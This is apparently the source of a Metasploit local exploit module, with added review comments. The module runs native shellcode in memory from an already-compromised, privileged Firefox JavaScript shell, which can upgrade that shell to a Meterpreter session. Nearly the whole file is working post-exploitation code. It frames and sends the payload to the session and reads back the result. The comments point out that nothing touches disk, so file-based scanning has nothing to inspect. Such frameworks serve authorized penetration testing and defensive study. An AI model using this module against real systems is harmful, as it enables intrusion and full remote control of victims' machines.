Path: blob/master/modules/exploits/firefox/local/exec_shellcode.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local module that runs a native payload from an already-established,
# privileged Firefox JavaScript shell session.
#
# Per its own description, the payload is placed into memory, given the
# necessary protection flags and called, without touching the disk.
# NOTE(review): because nothing is written to disk, file-based scanning has
# no artifact to inspect; detection would presumably have to rely on the
# behaviour of the browser process -- confirm against your telemetry.
class MetasploitModule < Msf::Exploit::Local
  # No target autodetection, but the single target applies widely.
  Rank = ExcellentRanking

  include Msf::Payload::Firefox
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  # Registers the module metadata and the TIMEOUT option.
  #
  # @param info [Hash] metadata supplied by the framework, merged with the
  #   values below through update_info
  def initialize(info = {})
    module_info = update_info(
      info,
      'Name' => 'Firefox Exec Shellcode from Privileged Javascript Shell',
      'Description' => %q{
        This module allows execution of native payloads from a privileged Firefox Javascript shell.
        It places the specified payload into memory, adds the necessary protection flags,
        and calls it, which can be useful for upgrading a Firefox javascript shell to a Meterpreter
        session without touching the disk.
      },
      'License' => MSF_LICENSE,
      'Author' => ['joev'],
      'Platform' => ['firefox'],
      'DisclosureDate' => '2014-03-10',
      'Targets' => [
        [
          'Native Payload',
          {
            'Platform' => %w[linux osx win unix],
            'Arch' => ARCH_ALL
          }
        ]
      ],
      'DefaultTarget' => 0
    )
    super(module_info)

    # Upper bound, in seconds, on how long exploit waits for the shell's reply.
    timeout_option = OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])
    register_options([timeout_option])
  end

  # Sends the wrapped JavaScript to the existing session and reports the reply.
  #
  # The script is framed by [JAVASCRIPT]...[/JAVASCRIPT] markers and the reply
  # is read until the "[!JAVASCRIPT]" token or until TIMEOUT expires.
  # NOTE(review): the meaning of the literal 0 passed to
  # shell_read_until_token is defined by that helper, which is not visible here.
  # NOTE(review): any non-empty reply is printed with print_warning, so the
  # "Payload executed." success message and a caught exception are reported
  # through the same channel.
  def exploit
    print_status('Running the Javascript shell...')

    framed_script = "[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]"
    session.shell_write(framed_script)

    reply = session.shell_read_until_token('[!JAVASCRIPT]', 0, datastore['TIMEOUT'])
    print_warning(reply) if reply.present?
  end

  # Builds the JavaScript that is sent to the session.
  #
  # The script is an immediately-invoked function receiving `send`; it embeds
  # the text returned by run_payload (defined outside this file, presumably by
  # one of the included mixins), then reports either "Payload executed." or
  # the caught exception through `send`.
  #
  # @return [String] the script with surrounding whitespace stripped
  def js_payload
    script = %Q|
      (function(send){
        try {
          #{run_payload}
          send("Payload executed.");
        } catch (e) {
          send(e);
        }
      })(send);
    |
    script.strip
  end
end